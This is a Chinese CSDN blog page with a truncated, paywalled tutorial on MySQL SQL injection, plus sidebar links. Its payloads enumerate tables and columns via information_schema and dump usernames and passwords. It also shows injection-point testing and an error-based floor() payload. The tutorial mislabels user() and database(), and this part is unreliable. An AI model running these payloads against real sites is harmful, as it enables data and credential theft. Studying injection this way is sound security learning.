sql注入-mysql注入

最新推荐文章于 2022-06-21 16:14:57 发布
VIP文章 最新推荐文章于 2022-06-21 16:14:57 发布
阅读量188 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38849692/article/details/119349145
版权

sql常用的注入语句

查询数据库----假设为 security

select database();

在这里插入图片描述

查询数据库中的表

 select group_concat(table_name) from information_schema.tables where table_schema=database();

在这里插入图片描述

查询表中的字段名(security.users表中的列)

select group_concat(column_name) from information_schema.columns where table_name='users';

在这里插入图片描述

查询字段的值(0x3a是:)

select group_concat(username,0x3a,password) from users;

在这里插入图片描述

学习SQL注入简单类型:

如何判断注入点:
	and 1=1 页面正常
	and 1=2 页面错误
	可能存在注入点
选用经验最足的方法去测试:
	或 且 非 三种逻辑判断符
	判断输入的字符是否对页面造成影响,带入数据库进行了查询。

信息收集:

数据库版本:version()
数据库名字:user()
数据库用户:database()
操作系统:@@version_comp
最低0.47元/天 解锁文章
qq_38849692
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
SQL注入
weixin_64655821的博客
10-10 1695
SQL注入,联合查询,盲注
mysql注入0x_Mysql-注入总结
weixin_40003478的博客
02-03 320
Mysql-注入细节总结前言尽量深层次剖析每一个细节,最基础的东西往往会因为太过熟悉而抛弃细节环境搭建mysqlcreate database users;use users;create table person2(username text,password text);insert into person2 values ("admin","123456");insert into pers...
【转载】c语言位域基础知识讲解
tecoes的博客
07-12 450
有些信息在存储时,并不需要占用一个完整的字节, 而只需占几个或一个二进制位。例如在存放一个开关量时,只有0和1 两种状态,用一位二进位即可。为了节省存储空间,并使处理简便,C语言又提供了一种数据结构,称为“位域”或“位段”。所谓“位域”是把一个字节中的二进位划分为几个不同的区域,并说明每个区域的位数。每个域有一个域名,允许在程序中按域名进行操作。 这样就可以把几个不同的对象用一个字节的二进制位域来表示。位域在本质上就是一种结构类型, 不过其成员是按二进位分配的。 在结构体定义时,我们可以指定某个成员.
C语言结构体
yangtuoi的博客
07-12 257
像 int、float、char等是由C语言本身提供的数据类型,不能再进行分拆,我们称之为基本数据类型;而结构体可以包含多个基本类型的数据,也可以包含其他的结构体,我们将它称为复杂数据类型或构造数据类型。 include <stdio.h> int main(){ struct{ char *name; //姓名 int num; //学号 int age; //年龄 char group; //所在小组 .
HEX文件格式分析
蓝晴明的博客
08-10 1981
日常开发工作中hex文件是经常用到的一种文件格式,例如生产部门进行量产程序烧录,那么往往使用的是HEX文件。 下面以stm32生成的hex为例,分析hex的文件格式: 官方定义: <0x3a>[数据长度1Byte][数据地址2Byte][数据类型1Byte][数据nByte][校验1Byte]<0x0d><0x0a> 打开一个stm32生成的hex文件: 1)结合格式分析第一行(指定基地址) :020000040800F2(:02 0000 04 0800 F2) 解析:
MySQL 及 SQL 注入
12-16
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到...
SQL Injection with MySQL 注入分析
09-14
本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
sql注入讲解ppt.pptx
08-10
sql注入一些基础知识的讲解
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
C语言基础-----进制转换,原码反码补码
alexhs0的专栏
09-16 3933
知识点: 1.十进制与二进制之间的相互转换 2.二进制与十六进制之间的相互转换 3.正数和负数在内存中的表示方式 4.如何知道一个补码所表示的数       ======================================== 进制和补码 1.二进制 2.十六进制 3.八进制 4.数据在内存中的存储方式   1)正数和负数   2)原码,反码,补码 ==
SQL注入之盲注类型--报错注入函数
weixin_45923850的博客
12-20 370
报错函数 floor() cancat() 将符合条件的所有数据进行拼接,0x7e为‘~’,0x3a为‘:’ 将产生的虚拟表的主键名换为name:select concat(0x7e,database(),0x7e)name或者select concat(0x7e,database(),0x7e) as name 举例:select concat(0x7e,database(),0x7e) rand() rand():生成0-1之间的随机数 rand()*2:生成0-2之间的随机数(2不包含) r
MySQL函数
captain
06-04 188
--1. mid()---从文本字段中提取字符; /* column_name 必需。要提取字符的字段。 start 必需。规定开始位置(起始值是 1)。 length 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。 */ select mid(user,1,2) from mysql.user; select mid(user,2) from mysql.user; --2. limit()---返回前几条或者中间某几行数据。第0条开始取3条 select user ...
mysql floor报错_mysql数据库注入floor报错
weixin_42628941的博客
01-27 249
1、通过floor报错可以通过如下一些利用代码and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);and (select count(*) from (select 1 union select null union s...
mysql盲注总结
z7sz的博客
06-21 1083
本文的内容主要是对mysql盲注的总结
mysql 注入 爆表_Mysql注入总结(三)
weixin_31523667的博客
01-20 124
昨天整理点东西的时候看到了几年前以前收集的一篇文章,今天也就写两个字。说的是爆表的时候出现[table]前缀,后来改用hex(),然后unhex()出现真正的表名原文:《MYSQL注入解决方括号[table]前缀问题》代码如下:'union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+table_name+...
数据库注入过滤总结
zhangshanfeng_的博客
06-17 842
数据库注入总结 文章目录数据库注入总结fuzzMYSQL基本语句万能密码报错注入盲注时间盲注绕过配合sprintfsqlmap文件操作waf绕过结构猜测 fuzz burp的爆破功能,使用wfuzz的sql字典 可以初步得知过滤的情况 MYSQL 基本语句 数据库名 SELECT database(); SELECT group_concat(schema_name) FROM informa...
MySQL数据库5.X版本基本手工注入总结(转)
润丰
10-20 2713
根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话webshell。 当拿到一个MySQL注入点的时候,我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时,是不支持union select联合查询的;当MySQL版本大于5.0时,有个默认数据库information_schema
0x3A 博弈论之SG函数
weixin_30952535的博客
08-02 114
博弈即玄学啊 (除了nim和二分图博弈什么都不会 算是学了下SG函数吧 这个东西是针对有向图游戏的,相当于把一个局面看作一个点,到达下个局面相当于建一条边 必胜态SG值为0 那么对于一个点,他的SG值就是所有能够到达他的点的SG值的mex 对于有向图游戏的和(也就是有多个有向图同时进行游戏),那么就把那些局面的SG值xor起来再求mex poj2311 这个可以说是很经典了,首先带1的...
墨者sql注入mysql
最新发布
09-29
墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握手工注入的方法。然后,他可以使用字符串的MD5加解密技术来解密密码。 第二种方法是使用工具注入,如sqlmap。墨者可以使用sqlmap工具来爆破数据库名和当前用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值